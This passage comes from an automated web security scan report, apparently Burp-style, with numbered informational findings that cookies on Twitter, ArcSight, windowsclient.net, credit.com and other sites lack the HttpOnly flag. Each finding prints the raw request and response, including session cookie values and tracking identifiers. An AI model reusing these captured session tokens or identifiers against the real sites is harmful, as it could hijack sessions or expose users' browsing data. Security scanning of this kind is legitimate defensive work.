7C%7C%7C%3E%7C%7C%7C%7C%7C%7C%7C%7C%7C%7C&c29=Less%20than%201%20day&v29=Less%20than%201%20day&c34=D%3Dv34&v34=http%3A%2F%2Fwww.truecredit.com%2F&c35=tc&v35=D%3Dc35&c47=1&c52=D%3Ds_vi&v52=D%3Ds_vi&c53=D%3Dv53&s=1920x1200&c=16&j=1.6&v=Y&k=Y&bw=1034&bh=907&p=Shockwave%20Flash%3BJava%20Deployment%20Toolkit%206.0.240.7%3BJava(TM)%20Platform%20SE%206%20U24%3BSilverlight%20Plug-In%3BChrome%20PDF%20Viewer%3BGoogle%20Gears%200.5.33.0%3BWPI%20Detector%201.3%3BGoogle%20Update%3BDefault%20Plug-in%3B&AQE=1
X-C: ms-4.4.1
Expires: Sun, 24 Apr 2011 00:49:43 GMT
Last-Modified: Tue, 26 Apr 2011 00:49:43 GMT
Cache-Control: no-cache, no-store, must-revalidate, max-age=0, proxy-revalidate, no-transform, private
Pragma: no-cache
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSA OUR IND COM NAV STA"
xserver: www78
Content-Length: 0
Content-Type: text/plain


18.425. http://twitter.com/statuses/user_timeline/PrivacyGuard.json  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://twitter.com
Path:   /statuses/user_timeline/PrivacyGuard.json

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /statuses/user_timeline/PrivacyGuard.json?callback=twitterCallback2&count=2 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: twitter.com

Response

HTTP/1.0 200 OK
Date: Sun, 24 Apr 2011 20:22:25 GMT
Server: hi
Status: 200 OK
X-Transaction: 1303676545-83498-13024
X-RateLimit-Limit: 150
ETag: "a6b94834b7e908b36e6269c9b07e6639"
Last-Modified: Sun, 24 Apr 2011 20:22:25 GMT
X-RateLimit-Remaining: 148
X-Runtime: 0.01319
X-Transaction-Mask: a6183ffa5f8ca943ff1b53b5644ef1146c459667
Content-Type: application/json; charset=utf-8
Content-Length: 3756
Pragma: no-cache
X-RateLimit-Class: api
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
X-RateLimit-Reset: 1303678616
Set-Cookie: k=173.193.214.243.1303676545859002; path=/; expires=Sun, 01-May-11 20:22:25 GMT; domain=.twitter.com
Set-Cookie: guest_id=130367654586336660; path=/; expires=Tue, 24 May 2011 20:22:25 GMT
Set-Cookie: _twitter_sess=BAh7CDoPY3JlYXRlZF9hdGwrCEhrLYkvAToHaWQiJTQwMjcyMGU1NWFlM2E5%250ANzVkNWFmYmM5ZWMwZWU5MmIzIgpmbGFzaElDOidBY3Rpb25Db250cm9sbGVy%250AOjpGbGFzaDo6Rmxhc2hIYXNoewAGOgpAdXNlZHsA--dadafb648655cc115f440a9e6a1df170894cd5c8; domain=.twitter.com; path=/; HttpOnly
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Connection: close

twitterCallback2([{"text":"The New Ways Thieves Are Stealing Your Identity: http:\/\/t.co\/2CGbAGa via @forbes. All the more reason to make sure you are protected!","geo":null,"in_reply_to_status_id":
...[SNIP]...

18.426. http://twitter.com/statuses/user_timeline/PrivacyGuard.json  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://twitter.com
Path:   /statuses/user_timeline/PrivacyGuard.json

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /statuses/user_timeline/PrivacyGuard.json?callback=twitterCallback2&count=2 HTTP/1.1
Host: twitter.com
Proxy-Connection: keep-alive
Referer: http://www.privacyguard.com/?ref=P158PGDTCSD0007
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: k=173.193.214.243.1303141668067295; guest_id=130340348934320043; __utmz=43838368.1303561994.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); js=1; __utma=43838368.551233229.1303561994.1303561994.1303568398.2

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 00:53:46 GMT
Server: hi
Status: 200 OK
X-Transaction: 1303692826-42522-823
X-RateLimit-Limit: 150
ETag: "a6b94834b7e908b36e6269c9b07e6639"-gzip
Last-Modified: Mon, 25 Apr 2011 00:53:46 GMT
X-RateLimit-Remaining: 148
X-Runtime: 0.01314
X-Transaction-Mask: a6183ffa5f8ca943ff1b53b5644ef1146c459667
Content-Type: application/json; charset=utf-8
Pragma: no-cache
X-RateLimit-Class: api
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
X-RateLimit-Reset: 1303695272
Set-Cookie: original_referer=ZLhHHTiegr%2FpCYvqQuqxRmS0bryNnltYal5DIOcfO%2FuMwRX9CclKmgZ05fTnqRsBFXD47bK79ak%3D; path=/
Set-Cookie: _twitter_sess=BAh7CDoPY3JlYXRlZF9hdGwrCE7WJYovAToHaWQiJTUyODBiNmVlNGFhN2Y3%250ANGQ5MDRlZjVhZDczYzM2MTJmIgpmbGFzaElDOidBY3Rpb25Db250cm9sbGVy%250AOjpGbGFzaDo6Rmxhc2hIYXNoewAGOgpAdXNlZHsA--4a2b9e5622d64394b4083163494f4edc5dfb6d07; domain=.twitter.com; path=/; HttpOnly
Vary: Accept-Encoding
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Connection: close
Content-Length: 3756

twitterCallback2([{"text":"The New Ways Thieves Are Stealing Your Identity: http:\/\/t.co\/2CGbAGa via @forbes. All the more reason to make sure you are protected!","geo":null,"in_reply_to_status_id":
...[SNIP]...

18.427. https://vault.krypt.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://vault.krypt.com
Path:   /

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: vault.krypt.com
Connection: keep-alive
Referer: http://krypt.com/dedicated/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=218737475.1303662879.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=218737475.1223332803.1303662879.1303662879.1303662879.1; __utmc=218737475; __utmb=218737475.2.10.1303662879; cid=9b766d29f4a59d55b1ee0c2aaaa06184

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 16:35:06 GMT
Server: Apache/2.2.3 (CentOS)
Set-Cookie: UBERSID=eahltn4p28bi0jqqtdkv5insg2; path=/; secure
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 2760
Connection: close
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
   <title>Login</title>
   <link href="/locale/en_US/css/stylesheet
...[SNIP]...

18.428. http://windowsclient.net/default.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://windowsclient.net
Path:   /default.aspx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /default.aspx HTTP/1.1
Host: windowsclient.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Vary: Accept-Encoding
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
CommunityServer: 3.0.20416.853
Set-Cookie: CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sun, 24 Apr 2011 11:57:48 GMT; expires=Mon, 23-Apr-2012 15:57:48 GMT; path=/
Set-Cookie: CommunityServer-LastVisitUpdated-2101=; path=/
Set-Cookie: CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sun, 24 Apr 2011 11:57:48 GMT; expires=Mon, 23-Apr-2012 15:57:48 GMT; path=/
Set-Cookie: ASP.NET_SessionId=bqwdsc55oqlmmxy41sopjw55; path=/; HttpOnly
Set-Cookie: CSAnonymous=9034d616-8493-4d07-ad53-fcf4c9dd05c7; expires=Sun, 24-Apr-2011 16:17:48 GMT; path=/
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
Date: Sun, 24 Apr 2011 15:57:47 GMT
Content-Length: 61655


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

   
       
...[SNIP]...

18.429. http://windowsclient.net/omniture/analyticsid.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://windowsclient.net
Path:   /omniture/analyticsid.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /omniture/analyticsid.aspx HTTP/1.1
Host: windowsclient.net
Proxy-Connection: keep-alive
Referer: http://windowsclient.net/default.aspx
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CommunityServer-LastVisitUpdated-2101=; ASP.NET_SessionId=2dlrmzeif4das3yodap3v2ik; CSAnonymous=a0a12742-b6b7-493e-9db0-cc41c68d5450; CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sun, 24 Apr 2011 11:57:33 GMT

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Vary: Accept-Encoding
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
CommunityServer: 3.0.20416.853
Set-Cookie: CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sun, 24 Apr 2011 11:57:35 GMT; expires=Mon, 23-Apr-2012 15:57:35 GMT; path=/
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
Date: Sun, 24 Apr 2011 15:57:35 GMT
Content-Length: 67

<!--
gAnalyticsId="f0c8f1b3-d8ff-4c73-9580-bff076ac29a1";
// -->

18.430. http://windowsclient.net/themes/leanandgreen/common/home.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://windowsclient.net
Path:   /themes/leanandgreen/common/home.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /themes/leanandgreen/common/home.aspx?_TSM_HiddenField_=ctl00_ctl00_ctl02_HiddenField&_TSM_CombinedScripts_=%3b%3bAjaxControlToolkit%2c+Version%3d3.0.20820.16598%2c+Culture%3dneutral%2c+PublicKeyToken%3d28f01b0e84b6d53e%3aen-US%3a707835dd-fa4b-41d1-89e7-6df5d518ffb5%3ae2e86ef9%3a1df13a87%3aee0a475d%3ac4c00916%3a9ea3f0e2%3a9e8e87e9%3a9758eba HTTP/1.1
Host: windowsclient.net
Proxy-Connection: keep-alive
Referer: http://windowsclient.net/default.aspx
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CommunityServer-LastVisitUpdated-2101=; CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sun, 24 Apr 2011 11:57:31 GMT; ASP.NET_SessionId=2dlrmzeif4das3yodap3v2ik; CSAnonymous=a0a12742-b6b7-493e-9db0-cc41c68d5450

Response

HTTP/1.1 200 OK
Cache-Control: public
Content-Type: application/x-javascript
Expires: Mon, 23 Apr 2012 15:59:02 GMT
Last-Modified: Sat, 05 Feb 2011 00:44:06 GMT
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
CommunityServer: 3.0.20416.853
Set-Cookie: CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sun, 24 Apr 2011 11:59:01 GMT; expires=Mon, 23-Apr-2012 15:59:01 GMT; path=/
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
Date: Sun, 24 Apr 2011 15:59:00 GMT
Content-Length: 128029

//START AjaxControlToolkit.Common.Common.js
Type.registerNamespace('AjaxControlToolkit');AjaxControlToolkit.BoxSide = function() {
}
AjaxControlToolkit.BoxSide.prototype = {
Top : 0,
Right : 1,

...[SNIP]...

18.431. http://www.apmebf.com/r470js0-I/sz3/HGNLHPON/HPHHPMH/G/G/G  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.apmebf.com
Path:   /r470js0-I/sz3/HGNLHPON/HPHHPMH/G/G/G

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /r470js0-I/sz3/HGNLHPON/HPHHPMH/G/G/G?b=u4up%3DsupLm%2Bupqz5u5A%2B5tqr5%2B3q4063oq_03pq3uzsFG--ECDD-CG-EF--EC-DC-CGOPD%2663x%3Dt5514%25FM%25ER%25ER888.qo0z46yq3.q26urm9.o0y%25ERo0z46yq3%25ERxmzpuzs.qt5yx%25FR%25EHHq45m35%25FP%25EIo0y1mzAZmyq%25FPov_q4z1F3%3C%3Ct551%3A%2F%2F888.w2BArv.o0y%3AKC%2Foxuow-DLDDLID-DCJHDLKJ%3C%3CS%3C%3C HTTP/1.1
Host: www.apmebf.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: S=g14vo-36788-1303134591742-0g

Response

HTTP/1.1 302 Found
Server: Resin/3.1.8
P3P: policyref="http://www.apmebf.com/w3c/p3p.xml", CP="ALL BUS LEG DSP COR ADM CUR DEV PSA OUR NAV INT"
Cache-control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Expires: Sun, 24 Apr 2011 03:10:07 GMT
Location: http://www.emjcd.com/5k117js0-K/sz3/HGNLHPON/HPHHPMH/G/wHKA3FJMNOOFHJGJHJKLPHNKIFGw/LrrNvrsJMuIGHHuGOHKJGGIKuOMtvHMH?r=xtje%3DhjeAb%2Bjefoujuz%2Buifgu%2Bsftpvsdf_psefsjoh45--3122-15-34--31-21-15DE2%26vsm%3Diuuqt%254B%253G%253Gxxx.fdpotvnfs.frvjgby.dpn%253Gdpotvnfs%253Gmboejoh.fiunm%254G%25366ftubsu%254E%2537dpnqbozObnf%254Edk_ftoq4s<dkp!x7ry-t2xepAz<iuuq%3A%2F%2Fxxx.lr0zgk.dpn%3A91%2Fdmjdl-2A22A72-21862A98<<H<<
Set-Cookie: LCLK=cjo!w6qx-s1wdo9y; domain=.apmebf.com; path=/; expires=Fri, 22-Apr-2016 03:10:07 GMT
Content-Type: text/html
Connection: close
Date: Sun, 24 Apr 2011 03:10:07 GMT
Content-Length: 983

<html>
<head><meta http-equiv="redirect" content="http://www.emjcd.com/5k117js0-K/sz3/HGNLHPON/HPHHPMH/G/wHKA3FJMNOOFHJGJHJKLPHNKIFGw/LrrNvrsJMuIGHHuGOHKJGGIKuOMtvHMH?r=xtje%3DhjeAb%2Bjefoujuz%2Buifgu
...[SNIP]...

18.432. http://www.apture.com/js/apture.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.apture.com
Path:   /js/apture.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /js/apture.js?siteToken=4dGf14t HTTP/1.1
Host: www.apture.com
Proxy-Connection: keep-alive
Referer: http://www.infusionblog.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 200 OK
Expires: Mon, 25 Apr 2011 01:37:27 GMT
Last-Modified: Mon, 25 Apr 2011 01:37:27 GMT
Etag: "8d945e580d999bbe5702f570b02fd4bf"
Cache-Control: max-age=0
P3p: CP="NON CURa ADMa DEVa TAIa PSAa PSDa IVAa IVDa HISa OUR LEG UNI COM NAV INT"
Content-Type: text/javascript
Set-Cookie: AC=SkiS2H7dvV; Domain=.apture.com; expires=Sun, 17-Jan-2037 19:14:07 GMT; Path=/
Content-Length: 3714
Date: Mon, 25 Apr 2011 01:37:27 GMT


(function(){
var B=window.apture,A=window.apture=B||{};
if(!A.isApp){
A.prefs={};A.referer="http://www.infusionblog.com/";A.visitId=253300774889195;A.abtests={};A.userCookieId=null;
A.siteToken="4dG
...[SNIP]...

18.433. http://www.arcsight.com/blog/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.arcsight.com
Path:   /blog/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /blog/ HTTP/1.1
Host: www.arcsight.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: exp_last_visit=988332257; __utma=226624333.1483540328.1303674272.1303674272.1303674272.1; __utmc=226624333; __utmz=226624333.1303674272.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); _jsuid=3555580366436624596; exp_last_activity=1303692408; exp_tracker=a%3A2%3A%7Bi%3A0%3Bs%3A40%3A%22%2Fproducts%2Fproducts-esm%2Farcsight-express%2F%22%3Bi%3A1%3Bs%3A28%3A%22%2Fproducts%2Fproducts-identity%2F%22%3B%7D; __utmb=226624333

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 20:14:02 GMT
Server: Apache
Set-Cookie: exp_last_activity=1303694042; expires=Mon, 23-Apr-2012 20:14:02 GMT; path=/
Set-Cookie: exp_tracker=a%3A3%3A%7Bi%3A0%3Bs%3A6%3A%22%2Fblog%2F%22%3Bi%3A1%3Bs%3A40%3A%22%2Fproducts%2Fproducts-esm%2Farcsight-express%2F%22%3Bi%3A2%3Bs%3A28%3A%22%2Fproducts%2Fproducts-identity%2F%22%3B%7D; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Sun, 24 Apr 2011 20:14:02 GMT
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 36869

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<link rel="alternate" type="application/rss+xml" href="http://feeds.feedburner
...[SNIP]...

18.434. http://www.arcsight.com/products/products-esm/arcsight-express/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.arcsight.com
Path:   /products/products-esm/arcsight-express/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /products/products-esm/arcsight-express/ HTTP/1.1
Host: www.arcsight.com
Proxy-Connection: keep-alive
Referer: http://www.arcsight.com/products/products-identity/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: exp_last_visit=988332257; exp_last_activity=1303692257; exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A28%3A%22%2Fproducts%2Fproducts-identity%2F%22%3B%7D; __utma=226624333.1483540328.1303674272.1303674272.1303674272.1; __utmb=226624333; __utmc=226624333; __utmz=226624333.1303674272.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); _jsuid=3555580366436624596

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 20:13:34 GMT
Server: Apache
Set-Cookie: exp_last_activity=1303694014; expires=Mon, 23-Apr-2012 20:13:34 GMT; path=/
Set-Cookie: exp_tracker=a%3A2%3A%7Bi%3A0%3Bs%3A40%3A%22%2Fproducts%2Fproducts-esm%2Farcsight-express%2F%22%3Bi%3A1%3Bs%3A28%3A%22%2Fproducts%2Fproducts-identity%2F%22%3B%7D; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Sun, 24 Apr 2011 20:13:34 GMT
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 32216

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<title>ArcSight Express -
...[SNIP]...

18.435. http://www.arcsight.com/products/products-identity/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.arcsight.com
Path:   /products/products-identity/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /products/products-identity/ HTTP/1.1
Host: www.arcsight.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 19:47:09 GMT
Server: Apache
Set-Cookie: exp_last_visit=988332429; expires=Mon, 23-Apr-2012 19:47:09 GMT; path=/
Set-Cookie: exp_last_activity=1303692429; expires=Mon, 23-Apr-2012 19:47:09 GMT; path=/
Set-Cookie: exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A28%3A%22%2Fproducts%2Fproducts-identity%2F%22%3B%7D; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Sun, 24 Apr 2011 19:47:09 GMT
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 27444

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<title>ArcSight IdentityV
...[SNIP]...

18.436. http://www.arcsight.com/supportportal/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.arcsight.com
Path:   /supportportal/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /supportportal/ HTTP/1.1
Host: www.arcsight.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: exp_last_visit=988332257; __utma=226624333.1483540328.1303674272.1303674272.1303674272.1; __utmc=226624333; __utmz=226624333.1303674272.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); _jsuid=3555580366436624596; __utmb=226624333; exp_last_activity=1303692410; exp_tracker=a%3A3%3A%7Bi%3A0%3Bs%3A6%3A%22%2Fblog%2F%22%3Bi%3A1%3Bs%3A40%3A%22%2Fproducts%2Fproducts-esm%2Farcsight-express%2F%22%3Bi%3A2%3Bs%3A28%3A%22%2Fproducts%2Fproducts-identity%2F%22%3B%7D

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 20:14:54 GMT
Server: Apache
Set-Cookie: exp_last_activity=1303694094; expires=Mon, 23-Apr-2012 20:14:54 GMT; path=/
Set-Cookie: exp_tracker=a%3A4%3A%7Bi%3A0%3Bs%3A15%3A%22%2Fsupportportal%2F%22%3Bi%3A1%3Bs%3A6%3A%22%2Fblog%2F%22%3Bi%3A2%3Bs%3A40%3A%22%2Fproducts%2Fproducts-esm%2Farcsight-express%2F%22%3Bi%3A3%3Bs%3A28%3A%22%2Fproducts%2Fproducts-identity%2F%22%3B%7D; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Sun, 24 Apr 2011 20:14:54 GMT
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 24303

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<title>Welcome to the Arc
...[SNIP]...

18.437. http://www.credit.com/r/fico_score_watch_enroll/af=p39800&ag=default  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.credit.com
Path:   /r/fico_score_watch_enroll/af=p39800&ag=default

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /r/fico_score_watch_enroll/af=p39800&ag=default HTTP/1.1
Host: www.credit.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: crc=; cuc=1303674381486*http://www.credit.com/r/truelink_cmum_orderform/af=p39800&ag=true_monitor_order; ex=174a3c15; JSESSIONID=cefKL-PCj0eOzdZlgdj_s

Response

HTTP/1.1 301 Moved Permanently
Date: Sun, 24 Apr 2011 19:46:23 GMT
Server: Apache/2
P3P: CP="NOI DSP COR NID CURa ADMa TAIa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Vary: Accept-Encoding
Location: https://www.credit.com/r/fico_score_watch_enroll/af=p39800&ag=default
ETag: "4tXtsDfzwQq"
